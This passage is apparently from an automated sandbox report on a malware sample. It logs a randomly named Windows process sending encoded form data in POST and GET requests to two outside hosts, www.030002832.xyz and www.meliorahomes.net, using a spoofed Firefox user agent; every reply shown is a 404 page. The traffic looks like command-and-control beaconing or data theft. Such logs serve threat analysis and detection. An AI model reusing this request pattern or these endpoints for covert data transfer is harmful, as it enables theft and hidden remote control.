                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:53.720257998 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.4 | 50022 | 161.97.142.144 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:43:55.427784920 CET | 10820 | OUT | POST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 50 67 38 49 59 68 53 42 31 73 6e 70 2b 53 56 4e 34 41 6b 48 67 2f 7a 51 54 6b 6d 55 62 74 34 4b 4e 47 52 55 34 43 42 78 35 68 4a 4f 78 61 4f 35 62 43 67 58 49 4b 54 62 74 68 37 63 70 30 63 31 6c 6a 74 56 49 35 4c 2f 68 55 38 33 41 78 6b 38 78 70 4b 50 57 68 55 5a 6a 69 50 62 2b 67 42 66 59 56 77 42 63 4e 43 6f 68 48 2f 4f 32 7a 48 39 6f 37 73 51 6c 64 42 47 36 7a 6d 75 56 4a 41 67 4b 38 6e 48 45 59 62 59 36 77 67 6c 35 54 67 58 72 48 6d 53 78 6c 61 46 42 68 6e 6d 65 52 36 42 73 42 6b 30 33 4a 77 59 43 33 4b 6d 32 45 35 6c 58 66 32 4c 79 76 4c 56 6e 2f 4c 31 53 55 68 35 66 53 35 54 48 4e 47 59 55 6e 64 53 75 4d 4c 65 32 47 35 2b 4c 67 61 39 45 32 43 62 66 63 33 66 72 4f 57 4e 31 36 74 4e 79 72 53 49 4a 66 7a 44 46 2b 4d 77 48 42 50 34 35 6f 37 58 43 6f 33 64 78 35 79 42 35 38 62 4c 6c 55 6e 2f 65 73 53 37 74 77 30 6a 69 30 58 38 53 50 55 39 6e 41 6c 31 52 6a 38 54 32 62 52 73 4a 48 6f 42 7a 57 70 75 7a 6e 4a 65 33 36 7a 42 52 75 6f 34 55 36 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6Pg8IYhSB1snp+SVN4AkHg/zQTkmUbt4KNGRU4CBx5hJOxaO5bCgXIKTbth7cp0c1ljtVI5L/hU83Axk8xpKPWhUZjiPb+gBfYVwBcNCohH/O2zH9o7sQldBG6zmuVJAgK8nHEYbY6wgl5TgXrHmSxlaFBhnmeR6BsBk03JwYC3Km2E5lXf2LyvLVn/L1SUh5fS5THNGYUndSuMLe2G5+Lga9E2Cbfc3frOWN16tNyrSIJfzDF+MwHBP45o7XCo3dx5yB58bLlUn/esS7tw0ji0X8SPU9nAl1Rj8T2bRsJHoBzWpuznJe36zBRuo4U6PGnznH6mwI4AYNt+tdGtXf6DZJsfqARoPy/xjQbzvkS6SRTHOOP6x7ZqeViQzrI7Kye2tSERDprd3rsOTGOWG1OjYOoPQ/0SqlcAF6pt92NHOsIJHSpeNuwyDpZaIX1PdOE9Tm1QHvQm/ZpxoiN0JuB+dc+JA+RpV8dsB2V2S5FUUTR7ezDVU9eoOCb28xJ7beaQ/1Crqz7D5fw7LXgLPKbVRCWP0S95hVLLNy+VEwvTBH6wIHFCf12vNt6j9Oq9ep5h82SsrT7AlgNv3XNoSGFcMRQKtPUpcJohUsZAKqv0Y3lVC68CAl57uNPC5FocyNzTdhEgCNQsAo9iKvEo4xZp4Ldfs0bA30QPcrqB/jB2bju1B6EBt+Co6ptBDB9xZoBT09Z1LlkdMby7YVQfMFRBTZCbLA3M4ryYOFucskgzzNPYVm53ELCryhtCSQ7MVszFsqCPb3IkzoKTlFRR+ubN48Zg2sKCdk2u5WEukRujCpbcxzTc0qqIY7Pg2CXB6Tsi+oF7Un2O0KHXnvLjIzW8fJn3TlaHGjIaeZ+NuJkzrvqtSYHRPftoUSWA3sUGl4qC9rCvTOP9Vf8p0wZkdjbyqygMNRZxpvOimSTrFEXUF/dDDm+MZFinxg/LUg6KQZ3vzsiAhYhUgZbKDAW5e3L5Fe69tFBBLU [TRUNCATED]
                                                          Nov 5, 2024 15:43:56.255413055 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:56 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:56.255562067 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.4 | 50023 | 161.97.142.144 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:43:57.965922117 CET | 448 | OUT | GET /l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:58.817068100 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:58 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cce1df-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                          Nov 5, 2024 15:43:58.817099094 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                          Nov 5, 2024 15:43:58.817107916 CET | 424 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                          Nov 5, 2024 15:43:58.817148924 CET | 274 | IN | Data Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                          Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.4 | 50024 | 8.217.17.192 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:03.992121935 CET | 727 | OUT | POST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 61 72 43 47 4f 38 65 4a 46 43 46 7a 32 6b 69 56 75 72 68 64 69 4e 76 5a 74 56 4a 62 4b 50 71 48 61 46 68 41 6a 37 34 65 35 4f 77 55 39 6e 68 39 71 7a 41 49 43 58 63 75 64 73 57 4f 35 46 76 35 35 6b 6f 30 53 2f 30 53 7a 52 65 6e 59 54 50 58 69 6c 43 74 45 4c 62 50 43 4d 49 74 57 2b 4e 6c 4c 71 7a 32 75 47 6e 6d 66 36 47 38 77 31 45 65 6d 36 51 33 4c 44 64 4f 35 64 6e 50 43 50 54 37 4a 64 52 75 61 6d 5a 36 59 76 62 58 63 45 63 32 6d 59 37 36 5a 37 6e 30 2f 78 79 4b 6f 43 41 59 37 79 68 43 4e 2b 54 38 6b 76 72 56 44 38 59 49 4a 57 5a 2b 4e 51 3d 3d
                                                          Data Ascii: H0kxIVc=8pKw1ThT2h2RarCGO8eJFCFz2kiVurhdiNvZtVJbKPqHaFhAj74e5OwU9nh9qzAICXcudsWO5Fv55ko0S/0SzRenYTPXilCtELbPCMItW+NlLqz2uGnmf6G8w1Eem6Q3LDdO5dnPCPT7JdRuamZ6YvbXcEc2mY76Z7n0/xyKoCAY7yhCN+T8kvrVD8YIJWZ+NQ==
                                                          Nov 5, 2024 15:44:04.961210012 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:04 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.4 | 50025 | 8.217.17.192 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:06.791482925 CET | 747 | OUT | POST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 59 4c 79 47 64 76 32 4a 45 69 46 77 7a 6b 69 56 67 4c 68 42 69 4e 54 5a 74 51 35 4c 4c 38 65 48 61 67 64 41 69 35 41 65 36 4f 77 55 31 48 68 34 6e 54 41 35 43 58 51 51 64 70 75 4f 35 46 72 35 35 6c 59 30 53 4d 4d 52 68 78 65 68 42 6a 50 56 73 46 43 74 45 4c 62 50 43 49 59 44 57 2b 6c 6c 4c 62 44 32 75 6b 66 68 5a 4b 47 37 67 6c 45 65 69 36 52 66 4c 44 64 34 35 63 37 70 43 4a 66 37 4a 66 4a 75 61 33 5a 35 44 66 62 52 59 45 64 34 76 37 69 71 66 5a 32 56 33 32 61 49 33 41 34 33 7a 55 77 59 63 50 79 72 32 76 50 6d 65 37 52 38 45 56 6b 33 57 64 4e 42 74 58 45 41 74 67 4a 4c 77 66 34 45 71 39 57 36 52 79 63 3d
                                                          Data Ascii: H0kxIVc=8pKw1ThT2h2RYLyGdv2JEiFwzkiVgLhBiNTZtQ5LL8eHagdAi5Ae6OwU1Hh4nTA5CXQQdpuO5Fr55lY0SMMRhxehBjPVsFCtELbPCIYDW+llLbD2ukfhZKG7glEei6RfLDd45c7pCJf7JfJua3Z5DfbRYEd4v7iqfZ2V32aI3A43zUwYcPyr2vPme7R8EVk3WdNBtXEAtgJLwf4Eq9W6Ryc=
                                                          Nov 5, 2024 15:44:07.782651901 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:07 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.4 | 50026 | 8.217.17.192 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:09.332849979 CET | 10829 | OUT | POST /y4rz/ HTTP/1.1
                                                          Host: www.meliorahomes.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.meliorahomes.net
                                                          Referer: http://www.meliorahomes.net/y4rz/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 38 70 4b 77 31 54 68 54 32 68 32 52 59 4c 79 47 64 76 32 4a 45 69 46 77 7a 6b 69 56 67 4c 68 42 69 4e 54 5a 74 51 35 4c 4c 39 6d 48 61 79 6c 41 6a 59 41 65 37 4f 77 55 37 6e 68 35 6e 54 41 6b 43 58 4a 58 64 70 71 42 35 47 66 35 2f 33 51 30 46 74 4d 52 72 78 65 68 4a 44 50 49 69 6c 43 34 45 4c 71 47 43 4d 38 44 57 2b 6c 6c 4c 59 62 32 70 32 6e 68 62 4b 47 38 77 31 45 53 6d 36 52 6b 4c 44 46 47 35 66 58 66 43 5a 2f 37 49 2f 5a 75 59 42 74 35 65 76 62 54 56 6b 63 6c 76 37 66 77 66 5a 36 2f 33 7a 6d 6d 33 44 6b 33 33 6c 46 33 48 63 36 45 71 5a 44 38 50 4c 78 74 44 43 49 7a 58 76 6c 42 38 31 51 55 74 79 5a 65 72 50 52 59 77 50 57 46 43 69 6e 76 38 78 6a 52 4a 67 4b 58 6c 6a 37 4f 65 6b 4f 68 64 64 72 71 62 76 67 65 6e 59 66 51 7a 31 49 34 65 30 74 2f 77 2f 39 2b 70 68 50 2f 33 70 44 4b 46 70 46 4c 73 70 6b 51 7a 4a 79 4e 48 6a 4c 6f 64 74 79 38 76 49 2b 46 69 31 72 44 45 37 50 73 63 2b 68 64 79 6c 77 36 63 30 66 49 64 48 43 5a 61 48 33 4d 4a 78 63 71 32 4c 50 78 52 31 75 6b 34 35 [TRUNCATED]
                                                          Data Ascii: H0kxIVc= [TRUNCATED]
                                                          Nov 5, 2024 15:44:10.292805910 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:10 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                          Content-Length: 203
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.4 | 50027 | 8.217.17.192 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
